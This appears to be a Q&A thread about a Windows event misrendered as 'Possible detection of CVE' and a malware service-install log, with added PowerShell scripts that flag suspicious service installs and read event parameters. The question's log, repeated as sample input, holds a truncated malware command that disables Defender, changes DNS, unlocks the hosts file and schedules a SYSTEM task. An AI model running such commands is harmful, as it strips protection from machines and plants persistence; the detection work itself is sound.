Alert "Possible detection of CVE"

From the Windows event log, was the exploit blocked? Can I get the CVE number from the event log, so that I can find the specific KB number?

39536 Apr 13 08:31 Information Microsoft-Windows-Kernel-General 
1 Possible detection of CVE: 2020-04-13T01:31:16.580703600Z
Additional Information: 2020-04-13T01:31:16.580796000Z
This Event is generated when an attempt to exploit a known vulnerability 2020-04-13T01:31:16.580703600Z) is detected.
This Event is raised by a User mode process.

Also I got this malware log

Apr 13 08:29 Information Service Control Manager 1073748869 A service was installed in the system.
Service Name:  SYYHQSMMFDSEFEVOTKNH
Service File Name:  %COMSPEC% /C "cmd /c powershell -c
Set-MpPreference -DisableRealtimeMonitoring $true;(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).
SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))&powershell -c attrib -R C:\WINDOWS\system32\drivers\etc\hosts;$rh=-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122)));$cmd='schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa1 /F /tr \"powershell -c ''*awcna*

I have already patched the machine with MS17-010 and haven't found a successful logon in the log. So confusing...
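The second log line in the question is a Service Control Manager "A service was installed in the system" event; the number 1073748869 shown there is 7045 with the 0x40000000 qualifier bits set (1073741824 + 7045, i.e. 0x40001B85), so it can be queried as Id 7045. The script below is an added example (not code from the question, and not a Microsoft tool) that scores such service-install events on the traits visible in that log: a random-looking all-capitals service name, a service binary that is the shell itself, PowerShell in the command line, Defender real-time monitoring being switched off, and edits to the hosts file. It assumes the 7045 EventData fields are named ServiceName and ImagePath; the sample input is constructed from the question's (truncated) log line.

```powershell
# Added example; not code from the question or from Microsoft. It scores 7045
# "A service was installed in the system" events by the service name and the
# command line they carry, using the patterns visible in the question's log.

function Test-SuspiciousServiceInstall {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$ImagePath
    )
    $reasons = @()
    # A long, random-looking, all-capitals service name is a common artefact of
    # tooling that installs a one-off service to run a command as SYSTEM.
    if ($ServiceName -cmatch '^[A-Z]{16,}$') { $reasons += 'random-looking service name' }
    # A service whose "binary" is the command shell rather than an executable is
    # unusual for legitimate software.
    if ($ImagePath -match '^%COMSPEC%|^cmd(\.exe)?\s') { $reasons += 'service runs through %COMSPEC%/cmd' }
    if ($ImagePath -match 'powershell') { $reasons += 'service runs PowerShell' }
    # Defender and hosts-file tampering, both present in the question's log.
    if ($ImagePath -match 'Set-MpPreference\s+-DisableRealtimeMonitoring') { $reasons += 'disables Defender real-time monitoring' }
    if ($ImagePath -match 'drivers\\etc\\hosts') { $reasons += 'touches the hosts file' }
    if ($ImagePath -match 'schtasks\s+/create') { $reasons += 'creates a scheduled task' }

    [pscustomobject]@{
        ServiceName = $ServiceName
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = $reasons
    }
}

function Get-SuspiciousServiceInstalls {
    # Reads live 7045 events from the System log. Assumption: the EventData
    # elements are named ServiceName and ImagePath (needs read access to the log).
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045 }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in @($xml.Event.EventData.Data)) { $data[$d.Name] = $d.'#text' }
        $result = Test-SuspiciousServiceInstall -ServiceName ([string]$data['ServiceName']) `
                                                -ImagePath   ([string]$data['ImagePath'])
        if ($result.Suspicious) {
            $result | Add-Member -NotePropertyName TimeCreated -NotePropertyValue $_.TimeCreated -PassThru
        }
    }
}

# Constructed sample built from the question's log line (it is truncated there,
# so it is truncated here as well).
$sample = Test-SuspiciousServiceInstall -ServiceName 'SYYHQSMMFDSEFEVOTKNH' `
    -ImagePath '%COMSPEC% /C "cmd /c powershell -c Set-MpPreference -DisableRealtimeMonitoring $true;(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@(''8.8.8.8'',''9.9.9.9''))&powershell -c attrib -R C:\WINDOWS\system32\drivers\etc\hosts;$cmd=''schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa1 /F /tr'
$sample | Format-List
```

Run against the sample, every check fires. On a live machine, `Get-SuspiciousServiceInstalls` applies the same checks to the System log; the service-install event records that the service was created, not whether the command succeeded, so its output is a lead to follow up in the PowerShell and Defender logs rather than a verdict by itself.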


I just posted this on a Microsoft forum question, and figured I'd share here (I like SE much better than MS forums :-P)

I just ran into this as well. One thing I did notice when trying to get more info is that there seems to be a discrepancy between what PowerShell is reporting and what the Event Viewer GUI is reporting. For Event 1 Category 5, I'm getting:

  • PowerShell: Possible detection of CVE: , Additional Information: . This Event is generated when an attempt to exploit a known vulnerability () is detected. This Event is raised by a User mode process.
  • GUI: The system time has changed to  from 

There is an associated Event 24 Category 11 that is showing:

  • PowerShell: The description for Event ID '24' in Source 'Microsoft-Windows-Kernel-General' cannot be found. The local computer may not have the necessary registry information or message DLL files to display the message, or you may not have permission to access them. The following information is part of the event:

  • GUI: The time zone information was refreshed with exit reason . Current time zone bias is .

Given the data that was passed, it looks to me like the GUI is right (time adjustment), and PowerShell is getting the wrong descriptions (CVE detection) for the events. The first event is passing datetimes that look like before and after datetimes, and the second event's second parameter is -600, which I believe correlates to the timezone I'm in (AEST, GMT+10, so 600 minute adjustment).
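The rendered `Message` property of a Windows event is produced by filling a message template from the provider's message resources, so when the template lookup goes wrong the parameters are still intact in the event's XML. The script below is an added example (not code from the answer, and not a Microsoft tool) that reads Kernel-General events 1 and 24 as XML, lists the raw parameters, and reports whether they look like a pair of timestamps (a system time change) or actually carry a CVE identifier. It assumes the event 1 data elements are named NewTime and OldTime; the sample XML is constructed from the timestamps in the question.

```powershell
# Added example; not code from the answer or from Microsoft. It takes the
# parameters of Microsoft-Windows-Kernel-General events from the event XML, so
# the result does not depend on which message template the viewer resolved.

function Get-KernelGeneralEventFacts {
    param([Parameter(Mandatory)][string]$EventXml)
    $xml = [xml]$EventXml

    # EventID is a plain string unless the element carries attributes (e.g. Qualifiers).
    $eid = $xml.Event.System.EventID
    $id  = if ($eid -is [string]) { [int]$eid } else { [int]$eid.'#text' }

    # EventData/Data elements are the %1, %2, ... parameters of the message template.
    $params = foreach ($d in @($xml.Event.EventData.Data)) {
        if ($d -is [string]) { [pscustomobject]@{ Name = $null;  Value = $d } }
        else                 { [pscustomobject]@{ Name = $d.Name; Value = $d.'#text' } }
    }
    $values = @($params | ForEach-Object { $_.Value } | Where-Object { $_ })

    $tsPattern     = '^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(\.\d+)?Z?$'
    $allTimestamps = ($values.Count -gt 0) -and
                     -not ($values | Where-Object { $_ -notmatch $tsPattern })
    $hasCve        = [bool]($values | Where-Object { $_ -match 'CVE-\d{4}-\d{4,}' })

    $verdict = if ($hasCve) { 'parameters carry a CVE identifier' }
               elseif ($id -eq 1 -and $allTimestamps) { 'event 1 with timestamp parameters: system time change, not an exploit detection' }
               elseif ($id -eq 24) { 'event 24: time zone information refreshed' }
               else { 'unrecognised; inspect the parameters' }

    [pscustomobject]@{
        Id                         = $id
        Parameters                 = $params
        AllParametersAreTimestamps = $allTimestamps
        ContainsCveIdentifier      = $hasCve
        Verdict                    = $verdict
    }
}

function Read-KernelGeneralEvents {
    param([int]$MaxEvents = 20)
    # Live query; needs read access to the System log.
    $filter = @{ LogName = 'System'; ProviderName = 'Microsoft-Windows-Kernel-General'; Id = 1, 24 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $facts = Get-KernelGeneralEventFacts -EventXml $_.ToXml()
            $facts | Add-Member -NotePropertyName TimeCreated     -NotePropertyValue $_.TimeCreated -PassThru |
                     Add-Member -NotePropertyName RenderedMessage -NotePropertyValue $_.Message     -PassThru
        }
}

# Constructed sample XML using the two timestamps from the question's log.
# Assumption: the data elements of event 1 are named NewTime and OldTime.
$sampleXml = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Kernel-General" />
    <EventID>1</EventID>
    <TimeCreated SystemTime="2020-04-13T01:31:16.580796000Z" />
  </System>
  <EventData>
    <Data Name="NewTime">2020-04-13T01:31:16.580703600Z</Data>
    <Data Name="OldTime">2020-04-13T01:31:16.580796000Z</Data>
  </EventData>
</Event>
'@

$facts = Get-KernelGeneralEventFacts -EventXml $sampleXml
$facts | Format-List
$facts.Parameters | Format-Table Name, Value
```

For the sample, `AllParametersAreTimestamps` is true and `ContainsCveIdentifier` is false, which matches the conclusion above: the parameters are a before/after pair of times, and nothing in the event identifies a CVE, so there is no KB number to derive from it. `Read-KernelGeneralEvents` does the same for live events and keeps the rendered `Message` beside the raw parameters so the two can be compared directly.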